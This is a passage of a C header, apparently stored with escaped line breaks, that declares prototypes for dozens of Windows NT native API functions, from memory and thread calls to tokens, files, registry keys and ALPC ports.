ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN MEMORY_INFORMATION_CLASS MemoryInformationClass,\r\n\tOUT PVOID MemoryInformation,\r\n\tIN SIZE_T MemoryInformationLength,\r\n\tOUT PSIZE_T ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenThreadToken(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN BOOLEAN OpenAsSelf,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN THREADINFOCLASS ThreadInformationClass,\r\n\tOUT PVOID ThreadInformation,\r\n\tIN ULONG ThreadInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtMapViewOfSection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN SIZE_T CommitSize,\r\n\tIN OUT PLARGE_INTEGER SectionOffset OPTIONAL,\r\n\tIN OUT PSIZE_T ViewSize,\r\n\tIN SECTION_INHERIT InheritDisposition,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Win32Protect);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckAndAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PBOOLEAN AccessStatus,\r\n\tOUT PBOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtUnmapViewOfSection(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress);\r\n\r\nEXTERN_C NTSTATUS 
NtReplyWaitReceivePortEx(\r\n\tIN HANDLE PortHandle,\r\n\tOUT PULONG PortContext OPTIONAL,\r\n\tIN PPORT_MESSAGE ReplyMessage OPTIONAL,\r\n\tOUT PPORT_MESSAGE ReceiveMessage,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtTerminateProcess(\r\n\tIN HANDLE ProcessHandle OPTIONAL,\r\n\tIN NTSTATUS ExitStatus);\r\n\r\nEXTERN_C NTSTATUS NtSetEventBoostPriority(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtReadFileScatter(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_SEGMENT_ELEMENT SegmentArray,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset OPTIONAL,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenThreadTokenEx(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN BOOLEAN OpenAsSelf,\r\n\tIN ULONG HandleAttributes,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcessTokenEx(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG HandleAttributes,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtQueryPerformanceCounter(\r\n\tOUT PLARGE_INTEGER PerformanceCounter,\r\n\tOUT PLARGE_INTEGER PerformanceFrequency OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN ULONG Index,\r\n\tIN KEY_INFORMATION_CLASS KeyInformationClass,\r\n\tOUT PVOID KeyInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtOpenFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG ShareAccess,\r\n\tIN ULONG OpenOptions);\r\n\r\nEXTERN_C NTSTATUS NtDelayExecution(\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER DelayInterval);\r\n\r\nEXTERN_C NTSTATUS NtQueryDirectoryFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN 
PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PUNICODE_STRING FileName OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemInformation(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN OUT PVOID SystemInformation,\r\n\tIN ULONG SystemInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtQueryTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tIN TIMER_INFORMATION_CLASS TimerInformationClass,\r\n\tOUT PVOID TimerInformation,\r\n\tIN ULONG TimerInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtFsControlFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG FsControlCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtWriteVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID Buffer,\r\n\tIN SIZE_T NumberOfBytesToWrite,\r\n\tOUT PSIZE_T NumberOfBytesWritten OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCloseObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN BOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtDuplicateObject(\r\n\tIN HANDLE SourceProcessHandle,\r\n\tIN HANDLE SourceHandle,\r\n\tIN HANDLE TargetProcessHandle OPTIONAL,\r\n\tOUT PHANDLE TargetHandle OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG HandleAttributes,\r\n\tIN ULONG Options);\r\n\r\nEXTERN_C 
NTSTATUS NtQueryAttributesFile(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PFILE_BASIC_INFORMATION FileInformation);\r\n\r\nEXTERN_C NTSTATUS NtClearEvent(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtReadVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tOUT PVOID Buffer,\r\n\tIN SIZE_T BufferSize,\r\n\tOUT PSIZE_T NumberOfBytesRead OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenEvent(\r\n\tOUT PHANDLE EventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAdjustPrivilegesToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN DisableAllPrivileges,\r\n\tIN PTOKEN_PRIVILEGES NewState OPTIONAL,\r\n\tIN ULONG BufferLength,\r\n\tOUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDuplicateToken(\r\n\tIN HANDLE ExistingTokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN BOOLEAN EffectiveOnly,\r\n\tIN TOKEN_TYPE TokenType,\r\n\tOUT PHANDLE NewTokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtContinue(\r\n\tIN PCONTEXT ContextRecord,\r\n\tIN BOOLEAN TestAlert);\r\n\r\nEXTERN_C NTSTATUS NtQueryDefaultUILanguage(\r\n\tOUT PLANGID DefaultUILanguageId);\r\n\r\nEXTERN_C NTSTATUS NtQueueApcThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PKNORMAL_ROUTINE ApcRoutine,\r\n\tIN PVOID ApcArgument1 OPTIONAL,\r\n\tIN PVOID ApcArgument2 OPTIONAL,\r\n\tIN PVOID ApcArgument3 OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtYieldExecution();\r\n\r\nEXTERN_C NTSTATUS NtAddAtom(\r\n\tIN PWSTR AtomName OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PUSHORT Atom OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateEvent(\r\n\tOUT PHANDLE EventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN EVENT_TYPE EventType,\r\n\tIN BOOLEAN InitialState);\r\n\r\nEXTERN_C NTSTATUS NtQueryVolumeInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK 
IoStatusBlock,\r\n\tOUT PVOID FsInformation,\r\n\tIN ULONG Length,\r\n\tIN FSINFOCLASS FsInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtCreateSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER MaximumSize OPTIONAL,\r\n\tIN ULONG SectionPageProtection,\r\n\tIN ULONG AllocationAttributes,\r\n\tIN HANDLE FileHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtFlushBuffersFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtApphelpCacheControl(\r\n\tIN APPHELPCACHESERVICECLASS Service,\r\n\tIN PVOID ServiceData);\r\n\r\nEXTERN_C NTSTATUS NtCreateProcessEx(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ParentProcess,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN HANDLE DebugPort OPTIONAL,\r\n\tIN HANDLE ExceptionPort OPTIONAL,\r\n\tIN ULONG JobMemberLevel);\r\n\r\nEXTERN_C NTSTATUS NtCreateThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ProcessHandle,\r\n\tOUT PCLIENT_ID ClientId,\r\n\tIN PCONTEXT ThreadContext,\r\n\tIN PUSER_STACK InitialTeb,\r\n\tIN BOOLEAN CreateSuspended);\r\n\r\nEXTERN_C NTSTATUS NtIsProcessInJob(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE JobHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtProtectVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG NewProtect,\r\n\tOUT PULONG OldProtect);\r\n\r\nEXTERN_C NTSTATUS NtQuerySection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN SECTION_INFORMATION_CLASS SectionInformationClass,\r\n\tOUT PVOID SectionInformation,\r\n\tIN ULONG SectionInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtResumeThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PULONG PreviousSuspendCount 
OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtTerminateThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN NTSTATUS ExitStatus);\r\n\r\nEXTERN_C NTSTATUS NtReadRequestData(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message,\r\n\tIN ULONG DataEntryIndex,\r\n\tOUT PVOID Buffer,\r\n\tIN ULONG BufferSize,\r\n\tOUT PULONG NumberOfBytesRead OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PLARGE_INTEGER AllocationSize OPTIONAL,\r\n\tIN ULONG FileAttributes,\r\n\tIN ULONG ShareAccess,\r\n\tIN ULONG CreateDisposition,\r\n\tIN ULONG CreateOptions,\r\n\tIN PVOID EaBuffer OPTIONAL,\r\n\tIN ULONG EaLength);\r\n\r\nEXTERN_C NTSTATUS NtQueryEvent(\r\n\tIN HANDLE EventHandle,\r\n\tIN EVENT_INFORMATION_CLASS EventInformationClass,\r\n\tOUT PVOID EventInformation,\r\n\tIN ULONG EventInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWriteRequestData(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Request,\r\n\tIN ULONG DataIndex,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenDirectoryObject(\r\n\tOUT PHANDLE DirectoryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByTypeAndAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN AUDIT_EVENT_TYPE AuditType,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus,\r\n\tOUT PBOOLEAN 
GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtWaitForMultipleObjects(\r\n\tIN ULONG Count,\r\n\tIN PHANDLE Handles,\r\n\tIN WAIT_TYPE WaitType,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationObject(\r\n\tIN HANDLE Handle,\r\n\tIN OBJECT_INFORMATION_CLASS ObjectInformationClass,\r\n\tIN PVOID ObjectInformation,\r\n\tIN ULONG ObjectInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtCancelIoFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtTraceEvent(\r\n\tIN HANDLE TraceHandle,\r\n\tIN ULONG Flags,\r\n\tIN ULONG FieldSize,\r\n\tIN PVOID Fields);\r\n\r\nEXTERN_C NTSTATUS NtPowerInformation(\r\n\tIN POWER_INFORMATION_LEVEL InformationLevel,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtSetValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING ValueName,\r\n\tIN ULONG TitleIndex OPTIONAL,\r\n\tIN ULONG Type,\r\n\tIN PVOID SystemData,\r\n\tIN ULONG DataSize);\r\n\r\nEXTERN_C NTSTATUS NtCancelTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tOUT PBOOLEAN CurrentState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PLARGE_INTEGER DueTime,\r\n\tIN PTIMER_APC_ROUTINE TimerApcRoutine OPTIONAL,\r\n\tIN PVOID TimerContext OPTIONAL,\r\n\tIN BOOLEAN ResumeTimer,\r\n\tIN LONG Period OPTIONAL,\r\n\tOUT PBOOLEAN PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByType(\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ULONG DesiredAccess,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tOUT PPRIVILEGE_SET PrivilegeSet,\r\n\tIN OUT PULONG PrivilegeSetLength,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus);\r\n\r\nEXTERN_C NTSTATUS 
NtAccessCheckByTypeResultList(\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tOUT PPRIVILEGE_SET PrivilegeSet,\r\n\tIN OUT PULONG PrivilegeSetLength,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN AUDIT_EVENT_TYPE AuditType,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus,\r\n\tOUT PULONG GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarmByHandle(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN AUDIT_EVENT_TYPE AuditType,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus,\r\n\tOUT PULONG GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtAcquireProcessActivityReference();\r\n\r\nEXTERN_C NTSTATUS NtAddAtomEx(\r\n\tIN PWSTR AtomName,\r\n\tIN ULONG Length,\r\n\tIN PRTL_ATOM Atom,\r\n\tIN ULONG 
Flags);\r\n\r\nEXTERN_C NTSTATUS NtAddBootEntry(\r\n\tIN PBOOT_ENTRY BootEntry,\r\n\tOUT PULONG Id OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAddDriverEntry(\r\n\tIN PEFI_DRIVER_ENTRY DriverEntry,\r\n\tOUT PULONG Id OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAdjustGroupsToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN ResetToDefault,\r\n\tIN PTOKEN_GROUPS NewState OPTIONAL,\r\n\tIN ULONG BufferLength OPTIONAL,\r\n\tOUT PTOKEN_GROUPS PreviousState OPTIONAL,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtAdjustTokenClaimsAndDeviceGroups(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN UserResetToDefault,\r\n\tIN BOOLEAN DeviceResetToDefault,\r\n\tIN BOOLEAN DeviceGroupsResetToDefault,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewUserState OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewDeviceState OPTIONAL,\r\n\tIN PTOKEN_GROUPS NewDeviceGroupsState OPTIONAL,\r\n\tIN ULONG UserBufferLength,\r\n\tOUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousUserState OPTIONAL,\r\n\tIN ULONG DeviceBufferLength,\r\n\tOUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousDeviceState OPTIONAL,\r\n\tIN ULONG DeviceGroupsBufferLength,\r\n\tOUT PTOKEN_GROUPS PreviousDeviceGroups OPTIONAL,\r\n\tOUT PULONG UserReturnLength OPTIONAL,\r\n\tOUT PULONG DeviceReturnLength OPTIONAL,\r\n\tOUT PULONG DeviceGroupsReturnBufferLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlertResumeThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tOUT PULONG PreviousSuspendCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlertThread(\r\n\tIN HANDLE ThreadHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlertThreadByThreadId(\r\n\tIN ULONG ThreadId);\r\n\r\nEXTERN_C NTSTATUS NtAllocateLocallyUniqueId(\r\n\tOUT PLUID Luid);\r\n\r\nEXTERN_C NTSTATUS NtAllocateReserveObject(\r\n\tOUT PHANDLE MemoryReserveHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN MEMORY_RESERVE_TYPE Type);\r\n\r\nEXTERN_C NTSTATUS NtAllocateUserPhysicalPages(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PULONG NumberOfPages,\r\n\tOUT PULONG 
UserPfnArray);\r\n\r\nEXTERN_C NTSTATUS NtAllocateUuids(\r\n\tOUT PLARGE_INTEGER Time,\r\n\tOUT PULONG Range,\r\n\tOUT PULONG Sequence,\r\n\tOUT PUCHAR Seed);\r\n\r\nEXTERN_C NTSTATUS NtAllocateVirtualMemoryEx(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PPVOID lpAddress,\r\n\tIN ULONG_PTR ZeroBits,\r\n\tIN OUT PSIZE_T pSize,\r\n\tIN ULONG flAllocationType,\r\n\tIN OUT PVOID DataBuffer OPTIONAL,\r\n\tIN ULONG DataCount);\r\n\r\nEXTERN_C NTSTATUS NtAlpcAcceptConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN HANDLE ConnectionPortHandle,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,\r\n\tIN PVOID PortContext OPTIONAL,\r\n\tIN PPORT_MESSAGE ConnectionRequest,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES ConnectionMessageAttributes OPTIONAL,\r\n\tIN BOOLEAN AcceptConnection);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCancelMessage(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN PALPC_CONTEXT_ATTR MessageContext);\r\n\r\nEXTERN_C NTSTATUS NtAlpcConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN PUNICODE_STRING PortName,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,\r\n\tIN ULONG Flags,\r\n\tIN PSID RequiredServerSid OPTIONAL,\r\n\tIN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,\r\n\tIN OUT PULONG BufferLength OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcConnectPortEx(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ConnectionPortObjectAttributes,\r\n\tIN POBJECT_ATTRIBUTES ClientPortObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,\r\n\tIN ULONG Flags,\r\n\tIN PSECURITY_DESCRIPTOR ServerSecurityRequirements OPTIONAL,\r\n\tIN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,\r\n\tIN OUT PSIZE_T BufferLength OPTIONAL,\r\n\tIN OUT 
PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreatePort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreatePortSection(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN SIZE_T SectionSize,\r\n\tOUT PHANDLE AlpcSectionHandle,\r\n\tOUT PSIZE_T ActualSectionSize);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreateResourceReserve(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN SIZE_T MessageSize,\r\n\tOUT PHANDLE ResourceId);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreateSectionView(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN OUT PALPC_DATA_VIEW_ATTR ViewAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreateSecurityContext(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN OUT PALPC_SECURITY_ATTR SecurityAttribute);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeletePortSection(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE SectionHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeleteResourceReserve(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE 